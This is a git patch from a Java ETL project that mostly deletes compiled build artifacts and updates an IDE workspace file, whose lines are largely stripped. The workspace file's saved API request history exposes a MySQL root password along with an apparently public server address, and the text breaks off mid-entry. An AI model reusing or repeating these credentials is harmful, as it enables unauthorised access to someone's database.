From afa42fc6074d7b9f9a4694f0038c3abaa6e8f884 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=88=98=E6=B3=BD=E7=92=8B?=
<2833784085@qq.com@user.noreply.gitee.com>
Date: Thu, 4 Jul 2024 14:59:37 +0800
Subject: [PATCH] =?UTF-8?q?=E4=BB=A3=E7=A0=81=E4=BC=98=E5=8C=96?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/workspace.xml | 289 ++++++++++++------
.../target/classes/bootstrap.yml | 51 ----
.../server/EtlAuthServerApplication.class | Bin 1363 -> 0 bytes
.../classes/com/auth/server/config/MD5s.class | Bin 2016 -> 0 bytes
.../com/auth/server/config/ShiroConfig.class | Bin 2813 -> 0 bytes
.../server/controller/LoginControler.class | Bin 2142 -> 0 bytes
.../controller/PermissionController.class | Bin 3600 -> 0 bytes
.../com/auth/server/mapper/PathMapper.class | Bin 310 -> 0 bytes
.../auth/server/mapper/PermissionMapper.class | Bin 323 -> 0 bytes
.../auth/server/mapper/UserMangeMapper.class | Bin 398 -> 0 bytes
.../com/auth/server/service/PathService.class | Bin 321 -> 0 bytes
.../server/service/PermissionService.class | Bin 466 -> 0 bytes
.../server/service/UserManageService.class | Bin 707 -> 0 bytes
.../server/service/impl/PathServiceImpl.class | Bin 888 -> 0 bytes
.../service/impl/PermissionServiceImpl.class | Bin 3757 -> 0 bytes
.../service/impl/UserManageServiceImpl.class | Bin 8494 -> 0 bytes
.../com/auth/server/util/SecurityUtils.class | Bin 1126 -> 0 bytes
.../com/auth/server/util/UserRealm.class | Bin 3559 -> 0 bytes
.../target/classes/mapper/PathMapper.xml | 6 -
.../classes/mapper/PermissionMapper.xml | 6 -
.../target/classes/mapper/UserMangeMapper.xml | 6 -
.../target/classes/static/index.html | 6 -
.../auth/common/entity/PathPermission.class | Bin 4351 -> 0 bytes
.../auth/common/entity/RolesPermission.class | Bin 2923 -> 0 bytes
.../com/auth/common/entity/UserAccount.class | Bin 3149 -> 0 bytes
.../common/enums/PermissionConstants.class | Bin 703 -> 0 bytes
.../EtlAuthServerApplicationTests.class | Bin 1674 -> 0 bytes
etl-auth/pom.xml | 1 -
.../target/classes/META-INF/spring.factories | 2 -
.../classes/com/etl/common/BaseEntity.class | Bin 3305 -> 0 bytes
.../classes/com/etl/common/Entity.class | Bin 3599 -> 0 bytes
.../com/etl/common/constants/Constants.class | Bin 649 -> 0 bytes
.../etl/common/constants/JwtConstants.class | Bin 542 -> 0 bytes
.../etl/common/constants/TokenConstants.class | Bin 614 -> 0 bytes
.../etl/common/enums/ResponseCodeEnum.class | Bin 2176 -> 0 bytes
.../etl/common/exception/AllException.class | Bin 1134 -> 0 bytes
.../common/exception/GlobalException.class | Bin 1152 -> 0 bytes
.../etl/common/exception/LimitException.class | Bin 823 -> 0 bytes
.../common/exception/ServiceException.class | Bin 1189 -> 0 bytes
.../common/handler/ExceptionHandlers.class | Bin 4172 -> 0 bytes
.../com/etl/common/result/CommonResult.class | Bin 3845 -> 0 bytes
.../com/etl/common/result/PageResult.class | Bin 3185 -> 0 bytes
.../com/etl/common/result/Result.class | Bin 4698 -> 0 bytes
.../com/etl/common/result/ResultBody.class | Bin 2988 -> 0 bytes
.../com/etl/common/util/JwtUtils.class | Bin 2747 -> 0 bytes
.../com/etl/common/util/RequestUtil.class | Bin 1616 -> 0 bytes
.../etl/common/util/RestTemplateConfig.class | Bin 659 -> 0 bytes
.../etl/common/util/RestTemplateUtil.class | Bin 6702 -> 0 bytes
.../com/etl/common/util/StringUtils.class | Bin 1723 -> 0 bytes
etl-common/target/etl-common-1.0-SNAPSHOT.jar | Bin 26480 -> 0 bytes
.../target/maven-archiver/pom.properties | 5 -
.../compile/default-compile/createdFiles.lst | 19 --
.../compile/default-compile/inputFiles.lst | 18 --
.../data/source/common/ennum/LimitType.class | Bin 1338 -> 0 bytes
.../data/source/common/pojo/BaseEntity.class | Bin 3401 -> 0 bytes
.../etl/data/source/common/pojo/Code.class | Bin 2813 -> 0 bytes
.../data/source/common/pojo/CodeType.class | Bin 2097 -> 0 bytes
.../data/source/common/pojo/DataSource.class | Bin 7858 -> 0 bytes
.../source/common/pojo/DataSourceType.class | Bin 2186 -> 0 bytes
.../source/common/pojo/DatabaseConfig.class | Bin 5283 -> 0 bytes
.../source/common/pojo/DatabaseRedis.class | Bin 2457 -> 0 bytes
.../etl/data/source/common/pojo/Person.class | Bin 2059 -> 0 bytes
.../etl/data/source/common/pojo/Rule.class | Bin 4777 -> 0 bytes
.../data/source/common/pojo/RuleType.class | Bin 2097 -> 0 bytes
.../etl/data/source/common/pojo/Task.class | Bin 6841 -> 0 bytes
.../common/pojo/TaskManagerEntity.class | Bin 3961 -> 0 bytes
.../common/pojo/constants/Constants.class | Bin 1824 -> 0 bytes
.../pojo/constants/MysqlConstants.class | Bin 474 -> 0 bytes
.../common/pojo/req/ConnectMysqlReq.class | Bin 2537 -> 0 bytes
.../source/common/pojo/req/DataRinse.class | Bin 5834 -> 0 bytes
.../common/pojo/req/DataSourceColumn.class | Bin 1544 -> 0 bytes
.../common/pojo/req/DataSourceReq.class | Bin 3366 -> 0 bytes
.../data/source/common/pojo/req/RuleReq.class | Bin 2922 -> 0 bytes
.../source/common/pojo/resq/ColumnInfo.class | Bin 4523 -> 0 bytes
.../etl/data/source/common/pojo/until/R.class | Bin 4055 -> 0 bytes
.../el-data-source-common-1.0-SNAPSHOT.jar | Bin 37865 -> 0 bytes
.../target/maven-archiver/pom.properties | 5 -
.../compile/default-compile/createdFiles.lst | 22 --
.../compile/default-compile/inputFiles.lst | 22 --
.../server/controller/DatabaseController.java | 1 +
.../target/classes/bootstrap.yml | 40 ---
.../ElDataSourceServerApplication.class | Bin 1428 -> 0 bytes
.../server/GlobalExceptionHandler.class | Bin 3926 -> 0 bytes
.../data/source/server/aop/LimitAspect.class | Bin 3238 -> 0 bytes
.../etl/data/source/server/config/Limit.class | Bin 732 -> 0 bytes
.../source/server/config/RedisConfig.class | Bin 1468 -> 0 bytes
.../source/server/config/RedissonConfig.class | Bin 2330 -> 0 bytes
.../data/source/server/config/Swagger$1.class | Bin 4015 -> 0 bytes
.../data/source/server/config/Swagger.class | Bin 3202 -> 0 bytes
.../controller/DataSheetController.class | Bin 676 -> 0 bytes
.../controller/DataSourceController.class | Bin 2653 -> 0 bytes
.../controller/DatabaseController.class | Bin 4941 -> 0 bytes
.../server/controller/RuleController.class | Bin 2753 -> 0 bytes
.../server/controller/TaskController.class | Bin 2856 -> 0 bytes
.../source/server/mapper/CodeBaseMapper.class | Bin 312 -> 0 bytes
.../server/mapper/DataSheetMapper.class | Bin 145 -> 0 bytes
.../server/mapper/DataSourceBaseMapper.class | Bin 330 -> 0 bytes
.../mapper/DataSourceTypeBaseMapper.class | Bin 342 -> 0 bytes
.../source/server/mapper/RuleBaseMapper.class | Bin 312 -> 0 bytes
.../source/server/mapper/TaskMapper.class | Bin 304 -> 0 bytes
.../server/service/DataSheetService.class | Bin 148 -> 0 bytes
.../server/service/DataSourceService.class | Bin 769 -> 0 bytes
.../server/service/DatabaseService.class | Bin 1099 -> 0 bytes
.../source/server/service/RuleService.class | Bin 816 -> 0 bytes
.../source/server/service/TaskService.class | Bin 501 -> 0 bytes
.../service/impl/DataSheetServiceImpl.class | Bin 658 -> 0 bytes
.../service/impl/DataSourceServiceImpl.class | Bin 7516 -> 0 bytes
.../service/impl/DatabaseServiceImpl.class | Bin 19104 -> 0 bytes
.../server/service/impl/RuleServiceImpl.class | Bin 8103 -> 0 bytes
.../server/service/impl/TaskServiceImpl.class | Bin 2697 -> 0 bytes
.../classes/mappers/DataSourceBaseMapper.xml | 7 -
.../compile/default-compile/createdFiles.lst | 0
.../compile/default-compile/inputFiles.lst | 28 --
etl-groovy/target/classes/bootstrap.yml | 81 -----
.../groovy/SpringBootGroovyApplication.class | Bin 880 -> 0 bytes
.../classes/com/etl/groovy/config/ACmp.class | Bin 635 -> 0 bytes
.../classes/com/etl/groovy/config/BCmp.class | Bin 635 -> 0 bytes
.../classes/com/etl/groovy/config/CCmp.class | Bin 635 -> 0 bytes
.../controller/GroovyTestController.class | Bin 1582 -> 0 bytes
.../com/etl/groovy/entity/Address.class | Bin 1923 -> 0 bytes
.../com/etl/groovy/mapper/AddressMapper.class | Bin 579 -> 0 bytes
.../groovy/service/GroovyTestService.class | Bin 697 -> 0 bytes
.../etl/groovy/util/SpringContextUtil.class | Bin 1633 -> 0 bytes
etl-groovy/target/classes/config/flow.el.xml | 6 -
.../java/com/controller/CarController.java | 6 +
.../src/main/java/com/mapper/CarDao.java | 2 +
.../src/main/java/com/service/CarService.java | 1 +
.../java/com/service/impl/CarServiceImpl.java | 5 +
etl-heihei/src/main/resources/ggg.bpmn20.xml | 40 +++
.../src/main/resources/mapper/CarDao.xml | 3 +
.../src/main/resources/刘泽璋的画画本.png | Bin 0 -> 8911 bytes
.../spring-configuration-metadata.json | 54 ----
.../etl/jwt/config/AuthJwtProperties.class | Bin 5180 -> 0 bytes
.../com/etl/jwt/util/JwtTokenUtil.class | Bin 8412 -> 0 bytes
.../target/etl-jwt-manage-1.0-SNAPSHOT.jar | Bin 8961 -> 0 bytes
.../target/maven-archiver/pom.properties | 5 -
.../compile/default-compile/createdFiles.lst | 3 -
.../compile/default-compile/inputFiles.lst | 2 -
.../default-testCompile/createdFiles.lst | 0
.../default-testCompile/inputFiles.lst | 0
140 files changed, 251 insertions(+), 491 deletions(-)
delete mode 100644 etl-auth/etl-auth-server/target/classes/bootstrap.yml
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/EtlAuthServerApplication.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/config/MD5s.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/config/ShiroConfig.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/controller/LoginControler.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/controller/PermissionController.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/mapper/PathMapper.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/mapper/PermissionMapper.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/mapper/UserMangeMapper.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/service/PathService.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/service/PermissionService.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/service/UserManageService.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/service/impl/PathServiceImpl.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/service/impl/PermissionServiceImpl.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/service/impl/UserManageServiceImpl.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/util/SecurityUtils.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/com/auth/server/util/UserRealm.class
delete mode 100644 etl-auth/etl-auth-server/target/classes/mapper/PathMapper.xml
delete mode 100644 etl-auth/etl-auth-server/target/classes/mapper/PermissionMapper.xml
delete mode 100644 etl-auth/etl-auth-server/target/classes/mapper/UserMangeMapper.xml
delete mode 100644 etl-auth/etl-auth-server/target/classes/static/index.html
delete mode 100644 etl-auth/etl-auth-server/target/production/etl-auth-common/com/auth/common/entity/PathPermission.class
delete mode 100644 etl-auth/etl-auth-server/target/production/etl-auth-common/com/auth/common/entity/RolesPermission.class
delete mode 100644 etl-auth/etl-auth-server/target/production/etl-auth-common/com/auth/common/entity/UserAccount.class
delete mode 100644 etl-auth/etl-auth-server/target/production/etl-auth-common/com/auth/common/enums/PermissionConstants.class
delete mode 100644 etl-auth/etl-auth-server/target/test-classes/com/auth/server/EtlAuthServerApplicationTests.class
delete mode 100644 etl-common/target/classes/META-INF/spring.factories
delete mode 100644 etl-common/target/classes/com/etl/common/BaseEntity.class
delete mode 100644 etl-common/target/classes/com/etl/common/Entity.class
delete mode 100644 etl-common/target/classes/com/etl/common/constants/Constants.class
delete mode 100644 etl-common/target/classes/com/etl/common/constants/JwtConstants.class
delete mode 100644 etl-common/target/classes/com/etl/common/constants/TokenConstants.class
delete mode 100644 etl-common/target/classes/com/etl/common/enums/ResponseCodeEnum.class
delete mode 100644 etl-common/target/classes/com/etl/common/exception/AllException.class
delete mode 100644 etl-common/target/classes/com/etl/common/exception/GlobalException.class
delete mode 100644 etl-common/target/classes/com/etl/common/exception/LimitException.class
delete mode 100644 etl-common/target/classes/com/etl/common/exception/ServiceException.class
delete mode 100644 etl-common/target/classes/com/etl/common/handler/ExceptionHandlers.class
delete mode 100644 etl-common/target/classes/com/etl/common/result/CommonResult.class
delete mode 100644 etl-common/target/classes/com/etl/common/result/PageResult.class
delete mode 100644 etl-common/target/classes/com/etl/common/result/Result.class
delete mode 100644 etl-common/target/classes/com/etl/common/result/ResultBody.class
delete mode 100644 etl-common/target/classes/com/etl/common/util/JwtUtils.class
delete mode 100644 etl-common/target/classes/com/etl/common/util/RequestUtil.class
delete mode 100644 etl-common/target/classes/com/etl/common/util/RestTemplateConfig.class
delete mode 100644 etl-common/target/classes/com/etl/common/util/RestTemplateUtil.class
delete mode 100644 etl-common/target/classes/com/etl/common/util/StringUtils.class
delete mode 100644 etl-common/target/etl-common-1.0-SNAPSHOT.jar
delete mode 100644 etl-common/target/maven-archiver/pom.properties
delete mode 100644 etl-common/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
delete mode 100644 etl-common/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/ennum/LimitType.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/BaseEntity.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/Code.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/CodeType.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/DataSource.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/DataSourceType.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/DatabaseConfig.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/DatabaseRedis.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/Person.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/Rule.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/RuleType.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/Task.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/TaskManagerEntity.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/constants/Constants.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/constants/MysqlConstants.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/req/ConnectMysqlReq.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/req/DataRinse.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/req/DataSourceColumn.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/req/DataSourceReq.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/req/RuleReq.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/resq/ColumnInfo.class
delete mode 100644 etl-data-source/el-data-source-common/target/classes/com/etl/data/source/common/pojo/until/R.class
delete mode 100644 etl-data-source/el-data-source-common/target/el-data-source-common-1.0-SNAPSHOT.jar
delete mode 100644 etl-data-source/el-data-source-common/target/maven-archiver/pom.properties
delete mode 100644 etl-data-source/el-data-source-common/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
delete mode 100644 etl-data-source/el-data-source-common/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
delete mode 100644 etl-data-source/el-data-source-server/target/classes/bootstrap.yml
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/ElDataSourceServerApplication.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/GlobalExceptionHandler.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/aop/LimitAspect.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/config/Limit.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/config/RedisConfig.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/config/RedissonConfig.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/config/Swagger$1.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/config/Swagger.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/controller/DataSheetController.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/controller/DataSourceController.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/controller/DatabaseController.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/controller/RuleController.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/controller/TaskController.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/mapper/CodeBaseMapper.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/mapper/DataSheetMapper.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/mapper/DataSourceBaseMapper.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/mapper/DataSourceTypeBaseMapper.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/mapper/RuleBaseMapper.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/mapper/TaskMapper.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/service/DataSheetService.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/service/DataSourceService.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/service/DatabaseService.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/service/RuleService.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/service/TaskService.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/service/impl/DataSheetServiceImpl.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/service/impl/DataSourceServiceImpl.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/service/impl/DatabaseServiceImpl.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/service/impl/RuleServiceImpl.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/com/etl/data/source/server/service/impl/TaskServiceImpl.class
delete mode 100644 etl-data-source/el-data-source-server/target/classes/mappers/DataSourceBaseMapper.xml
delete mode 100644 etl-data-source/el-data-source-server/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
delete mode 100644 etl-data-source/el-data-source-server/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
delete mode 100644 etl-groovy/target/classes/bootstrap.yml
delete mode 100644 etl-groovy/target/classes/com/etl/groovy/SpringBootGroovyApplication.class
delete mode 100644 etl-groovy/target/classes/com/etl/groovy/config/ACmp.class
delete mode 100644 etl-groovy/target/classes/com/etl/groovy/config/BCmp.class
delete mode 100644 etl-groovy/target/classes/com/etl/groovy/config/CCmp.class
delete mode 100644 etl-groovy/target/classes/com/etl/groovy/controller/GroovyTestController.class
delete mode 100644 etl-groovy/target/classes/com/etl/groovy/entity/Address.class
delete mode 100644 etl-groovy/target/classes/com/etl/groovy/mapper/AddressMapper.class
delete mode 100644 etl-groovy/target/classes/com/etl/groovy/service/GroovyTestService.class
delete mode 100644 etl-groovy/target/classes/com/etl/groovy/util/SpringContextUtil.class
delete mode 100644 etl-groovy/target/classes/config/flow.el.xml
create mode 100644 etl-heihei/src/main/resources/ggg.bpmn20.xml
create mode 100644 etl-heihei/src/main/resources/刘泽璋的画画本.png
delete mode 100644 etl-jwt-manage/target/classes/META-INF/spring-configuration-metadata.json
delete mode 100644 etl-jwt-manage/target/classes/com/etl/jwt/config/AuthJwtProperties.class
delete mode 100644 etl-jwt-manage/target/classes/com/etl/jwt/util/JwtTokenUtil.class
delete mode 100644 etl-jwt-manage/target/etl-jwt-manage-1.0-SNAPSHOT.jar
delete mode 100644 etl-jwt-manage/target/maven-archiver/pom.properties
delete mode 100644 etl-jwt-manage/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
delete mode 100644 etl-jwt-manage/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
delete mode 100644 etl-jwt-manage/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/createdFiles.lst
delete mode 100644 etl-jwt-manage/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
index 69e2e7f..2764cf5 100644
--- a/.idea/workspace.xml
+++ b/.idea/workspace.xml
@@ -4,65 +4,147 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
+
+
-
-
-
-
-
-
-
-
-
-
-
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
@@ -74,6 +156,7 @@
+
@@ -112,42 +195,42 @@
- {
+ "keyToString": {
+ "ASKED_ADD_EXTERNAL_FILES": "true",
+ "ApiPost:METDOD_SEND_RECORD:el-data-source-server": "{\"/test\":[{\"url\":\"http://localhost:8886/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"jdbc:mysql://localhost:3306/\\\",\\n \\\"user\\\": \\\"root\\\",\\n \\\"passWard\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"无法连接到MySQL数据库!\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":16.0,\"minute\":7.0,\"second\":1.0,\"nano\":8.935848E8}}},{\"url\":\"http://localhost:8886/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"jdbc:mysql://localhost:3306/health\\\",\\n \\\"user\\\": \\\"root\\\",\\n \\\"passWard\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"无法连接到MySQL数据库!\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":16.0,\"minute\":7.0,\"second\":17.0,\"nano\":1.862118E8}}},{\"url\":\"http://localhost:8886/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163:3306\\\",\\n \\\"user\\\": \\\"root\\\",\\n \\\"passWard\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"成功连接到MySQL数据库!\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":16.0,\"minute\":9.0,\"second\":16.0,\"nano\":9.248973E8}}},{\"url\":\"http://localhost:8886/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163:3306\\\",\\n \\\"user\\\": \\\"root\\\",\\n \\\"passWard\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"成功连接到MySQL数据库!\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":16.0,\"minute\":9.0,\"second\":22.0,\"nano\":1.626433E8}}},{\"url\":\"http://localhost:8886/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163:3306/health\\\",\\n \\\"user\\\": \\\"root\\\",\\n \\\"passWard\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"成功连接到MySQL数据库!\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":16.0,\"minute\":9.0,\"second\":28.0,\"nano\":6.040624E8}}},{\"url\":\"http://localhost:8886/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163:3306/health\\\",\\n \\\"user\\\": \\\"root\\\",\\n \\\"passWard\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"数据连接成功\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":16.0,\"minute\":15.0,\"second\":59.0,\"nano\":5.084082E8}}},{\"url\":\"http://localhost:8886/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"ok\\\"\\n}\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":8.0,\"minute\":58.0,\"second\":24.0,\"nano\":4.761775E8}}}],\"/test-database-connection\":[{\"url\":\"http://localhost:8886/test-database-connection\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163:health?serverTimezone\\u003dUTC\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": 